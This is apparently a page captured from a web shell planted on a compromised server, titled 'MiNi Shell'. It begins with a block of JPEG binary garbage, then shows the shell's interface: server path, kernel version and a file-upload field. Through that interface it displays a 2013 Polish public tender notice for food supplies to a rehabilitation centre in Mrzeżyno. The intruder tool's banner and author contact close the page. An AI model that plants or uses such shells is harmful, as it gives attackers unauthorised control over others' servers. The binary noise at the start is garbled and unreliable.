JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130304/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130304/86376-N-2013.html

<p class="kh_header"><b>Szczecin: Zakup i dostawa artykułów spożywczych
dla potrzeb Ośrodka Wczasowo-Rehabilitacyjnego Agawa 
z siedzibą w Mrzeżynie przy ul. Śliskiej 5</b><br>
<b>Numer ogłoszenia: 86376 - 2013; data zamieszczenia: 04.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nieruchomości i Opłaty Lokalne Sp. z o.o. , ul. Czesława 9, 71-804 Szczecin, woj. zachodniopomorskie, tel. 91 421 63 23, faks 91 421 63 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.niol.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów spożywczych
dla potrzeb Ośrodka Wczasowo-Rehabilitacyjnego Agawa 
z siedzibą w Mrzeżynie przy ul. Śliskiej 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest - zakup i dostawa nw. artykułów spożywczych dla potrzeb Ośrodka Wczasowo-Rehabilitacyjnego AGAWA w Mrzeżynie przy ul. Śliskiej  5.

Lp.	Nazwa produktu	Waga opakowania	Jednostka miary	Ilość
1	Ananas plastry (puszka)	3030g	szt.	24
2	Ananas plastry (puszka)	580g	szt.	36
3	Bazylia 	20g.	szt.	10
4	Biszkopty bezglutenowe	250 g.	kg	3
5	Brzoskwinie (puszka)	2650g	szt.	30
6	Brzoskwinie (puszka)	820g	szt.	40
7	Budyń czekoladowy 	1 kg	szt.	10
8	Budyń śmietankowy 	1 kg	szt.	10
9	Budyń waniliowy 	1 kg	szt.	10
10	Cebulka konserwowa 	314 g	szt.	15
11	Chrzan tarty 	180g	szt.	50
12	Ciastka bez cukru 	125 g	szt.	15
13	Ciastka bezglutenowe 	150g	szt.	20
14	Ciastka kokosowe bez cukru 	125 g	szt. 	70
15	Cukier 	25 kg	szt.	70
16	Cukier 	1 kg	szt.	180
17	Cukier puder 	0,5 kg	szt.	30
18	Cukier waniliowy 	32g	szt.	200
19	Cynamon mielony	20g	szt.	100
20	Czekolada 0% cukru 	80g	szt.	100
21	Przyprawa do mięs typu Delikat Knorr 	700g	szt.	30
22	Przyprawa do drobiu typu Delikat Knorr 	600g	szt.	30
23	Przyprawa do ryb typu Delikat Knorr 	600g	szt.	30
24	Dżem agrestowy wysokosłodzony 	7 kg	szt.	5
25	Dżem z aronii wysokosłodzony 	7 kg	szt.	5
26	Dżem brzoskwiniowy wysokosłodzony 	7 kg	szt.	10
27	Dżem z czarnej porzeczki wysokosł.	7 kg	szt.	10
28	Dżem ze śliwek wysokosłodzony 	7kg	szt.	30
29	Dżem truskawkowy wysokosłodzony 	7kg	szt.	30
30	Dżem bez cukru	310g	szt.	60
31	Fasola Jaś	-	kg	100
32	Fasolka konserwowa	2,5 kg	szt.	70
33	Galaretka agrestowa	1kg	szt.	20
34	Galaretka cytrynowa	1kg	szt.	20
35	Galaretka pomarańczowa	1kg	szt.	20
36	Galaretka truskawkowa	1kg	szt.	20
37	Galaretka wiśniowa	1kg	szt.	20
38	Galaretki różne	90g	szt.	50
39	Gałka muszkatołowa	20g	szt.	20
40	Groch łuskany połówki	-	kg	80
41	Groszek ptysiowy	80g	szt.	20
42	Groszek konserwowy	2,6kg	szt.	30
43	Groszek konserwowy	400g	szt.	50
44	Herbata expresowa typu Lipton	100 torebek	szt.	100
45	Herbata expresowa typu Saga	200 torebek	szt.	450
46	Jabłka prażone	5kg	szt.	50
47	Kakao typu Decomoreno	200g	szt.	500
48	Kasza gryczana	-	kg	150
49	Kasza jęczmienna	-	kg	60
50	Kasza manna	1kg	kg	80
51	Kasza bezglutenowa	-	kg	11
52	Kasza kukurydziana	350g	szt.	100
53	Kawa rozpuszczalna typu Jacobs	200g	szt.	100
54	Kawa mielona sypana typu Jacobs 	250g	szt.	30
55	Ketchup łagodny typu Kotlin	3kg	szt.	50
56	Ketchup łagodny typu Kotlin	1kg	szt.	100
57	Kisiel cytrynowy typu Winiary	1kg	szt.	10
58	Kisiel malinowy typu Winiary	1kg	szt.	10
59	Kisiel truskawkowy typu Winiary	1kg	szt.	10
60	Kisiel wiśniowy typu Winiary	1kg	szt.	10
61	Kisiel pomarańczowy typu Winiary	1kg	szt.	10
62	Kompot z czarnych porzeczek	0,9l.	szt.	400
63	Kompot ze śliwek	0,9l.	szt.	400
64	Kompot truskawkowy	0,9l.	szt.	400
65	Kompot wiśniowy	0,9l.	szt.	400
66	Koncentrat pomidorowy typu Dawtona	1kg	szt.	200
67	Kotlety sojowe	500g	kg	10
68	Kotlety wegetariańskie	-	kg	20
69	Kukurydza konserwowa	2,74kg	szt.	100
70	Kukurydza konserwowa	400g.	szt.	30
71	Kwasek cytrynowy	1kg	szt.	25
72	Kwasek cytrynowy	20g.	szt.	200
73	Liść laurowy	12g.	szt.	20
74	Majeranek	20g.	szt.	20
75	majonez typu Winiary	700g	szt.	70
76	Makaron bezglutenowy	-	kg	10
77	Makaron kolanko z falbankami	-	kg	100
78	Makaron muszelka	-	kg	70
79	Makaron świderki	-	kg	160
80	Makaron krajanka -min. 5-cio jajeczny	-	kg	700
81	Zacierki babuni - min. 2 jajeczne	250g	szt.	470
82	Makaron rurka	-	kg	100
83	Marmolada	7kg	szt.	5
84	Miód wielokwiatowy	25g.	szt.	100
85	Musztarda delikatesowa stołowa	1kg	szt.	65
86	Musztarda delikatesowa stołowa	5kg	szt.	40
87	Mąka pszenna typ. 500	1kg	szt.	60
88	Mąka pszenna typ 500	25kg	szt.	40
89	Mąka bezglutenowa	-	kg	15
90	Ocet spirytusowy 10%	0,5l.	szt.	60
91	Ogórki konserwowe	900g	szt.	45
92	Ogórki konserwowe	1500ml.	szt.	200
93	Olej uniwersalny	5l.	szt.	350
94	Olej typu kujawski	1l.	szt.	30
95	Orergano	10g.	szt.	20
96	Papryka konserwowa - ćwiartki	2,65l.	szt.	100
97	Papryka słodka - proszek	20g.	szt.	100
98	Papryka ostra - proszek 	20g.	szt.	100
99	Pieczarki sterylizowane	3kg	szt.	100
100	Pieczarki sterylizowane - całe 	870ml.	szt.	10
101	Pieprz czarny mielony	1kg	szt.	12
102	Pieprz czarny mielony	15g.	szt.	50
103	Pieprz ziołowy	20g.	szt.	20
104	Proszek do pieczenia 	36g.	szt.	50
105	Przyprawa do zup w płynie typu Knorr	1,0l.	szt.	60
106	Ziele angielskie	20g.	szt.	60
107	Rosół z kury - kostka 	60g.	szt.	300
108	Ryż	1kg.	szt.	300
109	Słodzik	100szt.	szt.	10
110	Słodzik w płynie	250ml.	szt.	10
111	Chrzan tarty	900g.	szt.	50
112	Bazylia	1 kg	szt.	3
113	Szparagi konserwowe	330g.	szt.	20
114	Sól jodowana	1kg.	szt.	500
115	Przyprawa typu Vegeta Podravka	1kg.	szt.	150
116	Wafle bez cukru	95g.	szt.	50
117	Zioła prowansalskie	10g.	szt.	20
118	Żelatyna	40g.	szt.	30
119	Tymianek	10g.	szt.	50
120	Płatki kukurydziane	500g.	szt.	200
121	Bułka tarta bezglutenowa	500g.	szt.	10
122	Płatki jęczmienne	500g.	szt.	100
123	Majeranek	1kg.	szt.	3
124	Przecier ogórkowy	2,65kg.	szt.	30
125	Szczaw konserwowy	2,65kg.	szt.	40
126	Makaron lasagne	500g.	szt.	60
127	Podgrzybki marynowane	250g.	szt.	10
128	Pieczarki marynowane	800ml.	szt.	15
129	Makaron spaghetti	500g.	szt.	100
130	Podgrzybek suszony	500g.	szt.	8
131	Rodzynki	500g.	Szt.	15
132	Migdały w płatkach	75g.	Szt.	20
133	Słonecznik łuskany	500g.	Szt.	10
134	Śliwki suszone	-	Kg.	3
135	Żurawina suszona	-	Kg.	2
136	Oliwki zielone bez pestek	900ml.	Szt.	10
137	Oliwki czarne bez pestek	900ml.	Szt.	10
138	Przyprawa do gyrosa	30g.	Szt.	30
139	Sos sałatkowy typu Knorr	9g.	Szt.	30
140	Płatki kukurydziane czekoladowe	500g.	Szt.	10
141	Majonez typu Winiary	3kg.	Szt.	15
142	Soda oczyszczona	80g.	Szt.	20.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>wykonawcy mają dołączyć do oferty następujące dokumenty:
a) ofertę cenową zgodnie z Rozdziałem I pkt. 3 SIWZ,	
b) formularz cenowy - zgodnie z załącznikiem 1A do SIWZ.	
c) odpowiednie pełnomocnictwa;
Tylko w sytuacjach określonych w Rozdziale I pkt. 5 zdanie 2 SIWZ lub w przypadku składania oferty wspólnej (Rozdział III SIWZ),
d) oświadczenie - według wzoru stanowiącego Załącznik Nr 1 do SIWZ - wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.niol.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nieruchomości i Opłaty Lokalne sp. z o.o.
ul. Czesława 9
71-504 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 10:00, miejsce: Nieruchomości i Opłaty Lokalne sp. z o.o.
ul. Czesława 9
71-504 Szczecin
pok. 24, sekretariat, II p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com